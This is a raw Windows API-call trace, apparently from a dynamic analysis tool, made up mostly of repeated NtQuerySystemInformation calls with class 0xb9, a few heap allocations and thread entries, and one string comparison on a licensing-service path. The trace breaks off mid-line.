NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0282.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd150, Length=0x28, ResultLength=0x0) [0282.049] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd1d0, Length=0x50, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0282.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcfa0, Length=0x28, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.054] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0282.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd020, Length=0x28, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf00, Length=0x20, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd100, Length=0x38, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x20, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.058] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.059] GetProcessHeap () returned 0x27fc8db0000 [0282.059] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7bd70 [0282.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.096] GetProcessHeap () returned 0x27fc8db0000 [0282.096] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7bfb0 [0282.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0282.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) Thread: id = 478 os_tid = 0xd4c Thread: id = 479 os_tid = 0x1290 [0151.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.646] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.668] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.675] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.676] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0151.678] NtQuerySystemInformation (SystemInformationClass=0xb9, 